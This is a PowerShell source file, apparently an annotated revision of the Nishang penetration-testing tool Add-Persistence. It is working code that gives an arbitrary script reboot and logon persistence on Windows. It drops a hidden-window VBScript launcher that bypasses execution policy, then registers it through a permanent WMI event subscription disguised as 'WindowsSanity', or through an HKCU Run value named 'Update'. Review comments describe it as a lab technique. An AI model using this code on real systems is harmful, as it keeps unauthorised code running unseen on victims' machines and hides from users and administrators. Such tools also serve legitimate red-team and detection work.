
<#
.SYNOPSIS
Nishang script which could be used to add reboot persistence to a powershell script.
.DESCRIPTION
This script accepts path of a script to which reboot persistence is to be added.
The target script is copied into the user's temp directory, and the mechanism is chosen by privilege: when running as an elevated Administrator, a permanent WMI event subscription (an __EventFilter and ActiveScriptEventConsumer named "WindowsSanity" in root\subscription, fired on creation of a Win32_LogonSession) is used; otherwise an HKCU ...\CurrentVersion\Run value named "Update" is set. Both point at a small VBScript launcher (persist.vbs) that starts the dropped script with a hidden PowerShell window and -ExecutionPolicy Bypass.
Persistence created by this script can be removed with the Remove-Persistence.ps1 script in Nishang, which expects the fixed names above (WindowsSanity, Update, persist.vbs).
.PARAMETER ScriptPath
Path of the script to which persistence is to be added.
.Example
PS > Add-Persistence -ScriptPath C:\script.ps1
.LINK
http://labofapenetrationtester.blogspot.com/
https://github.com/samratashok/nishang
http://blogs.technet.com/b/heyscriptingguy/archive/2012/07/20/use-powershell-to-create-a-permanent-wmi-event-to-launch-a-vbscript.aspx
#>
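function Add-Persistence
{
<#
    Drops a copy of $ScriptPath into %TEMP% plus a VBScript launcher and
    registers the launcher for reboot/logon persistence.

    Parameters
        ScriptPath  Path of the PowerShell script to persist. Must exist; a
                    missing file raises a terminating error instead of silently
                    dropping an empty payload.

    Returns nothing. Side effects: writes two files under %TEMP%, and either
    creates three WMI instances in root\subscription (elevated) or writes an
    HKCU Run value (unprivileged).

    NOTE(review): every artifact name here is fixed (persist.vbs, the
    "WindowsSanity" filter/consumer, the "Update" Run value) and is relied on
    by Remove-Persistence.ps1, so they are kept byte-identical. The same fixed
    names, plus a payload living in %TEMP% launched with
    -ExecutionPolicy Bypass, make this trivially signaturable; treat it as a
    lab/demo technique, not an evasive one.
#>
    [CmdletBinding()] Param(
        [Parameter(Mandatory = $True)]
        [String]
        $ScriptPath
    )

    # Fail early on a bad path; Get-Content alone only emits a non-terminating
    # error and the rest of the function would persist an empty file.
    if (-not (Test-Path -Path $ScriptPath -PathType Leaf))
    {
        throw "Add-Persistence: script not found: $ScriptPath"
    }
    $body = Get-Content -Path $ScriptPath -ErrorAction Stop

    # The dropped payload is named after the invoking script file. If this
    # function was defined from an in-memory string, MyCommand.Name may be
    # empty and the payload path degenerates to the TEMP directory itself —
    # TODO confirm against how Nishang is normally loaded.
    $modulename = $script:MyInvocation.MyCommand.Name
    $name = "persist.vbs"

    # Kept in a dedicated variable: the original reused $scriptpath, which is
    # the same (case-insensitive) variable as the $ScriptPath parameter.
    $tempDir = $env:TEMP
    $payloadPath = "$tempDir\$modulename"
    $launcherPath = "$tempDir\$name"

    Out-File -InputObject $body -Force -FilePath $payloadPath

    # VBScript launcher. The payload path is wrapped in quotes inside the
    # VBScript string literal (VBScript escapes " as "") so a %TEMP% that
    # contains spaces does not split the -file argument.
    $launcher = @(
        "Set objShell = CreateObject(`"Wscript.shell`")",
        "objShell.run(`"powershell -WindowStyle Hidden -executionpolicy bypass -file `"`"$payloadPath`"`"`")"
    )
    Out-File -InputObject $launcher -Force -FilePath $launcherPath

    # IsInRole(Administrator) is false for a non-elevated admin token under UAC,
    # so that case falls through to the HKCU branch.
    $currentPrincipal = New-Object Security.Principal.WindowsPrincipal( [Security.Principal.WindowsIdentity]::GetCurrent())
    $isAdmin = $currentPrincipal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)

    if ($isAdmin -eq $true)
    {
        # Elevated: permanent WMI event subscription. The filter polls every
        # 30 s for a new Win32_LogonSession instance; the consumer runs the
        # VBScript launcher through the VBScript engine.
        $filterNS = "root\cimv2"
        $wmiNS = "root\subscription"
        $query = @"
Select * from __InstanceCreationEvent within 30
where targetInstance isa 'Win32_LogonSession'
"@
        $filterName = "WindowsSanity"
        # -ErrorAction Stop so a failed filter/consumer does not leave a
        # half-built subscription (binding against a null path).
        $filterPath = Set-WmiInstance -Class __EventFilter -Namespace $wmiNS -ErrorAction Stop -Arguments @{name=$filterName; EventNameSpace=$filterNS; QueryLanguage="WQL"; Query=$query}
        $consumerPath = Set-WmiInstance -Class ActiveScriptEventConsumer -Namespace $wmiNS -ErrorAction Stop -Arguments @{name=$filterName; ScriptFileName=$launcherPath; ScriptingEngine="VBScript"}
        Set-WmiInstance -Class __FilterToConsumerBinding -Namespace $wmiNS -Arguments @{Filter=$filterPath; Consumer=$consumerPath} | Out-Null
    }
    else
    {
        # Unprivileged: HKCU Run value pointing at the launcher (the launcher
        # was already written above; the original rewrote it here a second
        # time for no effect).
        New-ItemProperty -Path HKCU:Software\Microsoft\Windows\CurrentVersion\Run\ -Name Update -PropertyType String -Value $launcherPath -Force
    }
}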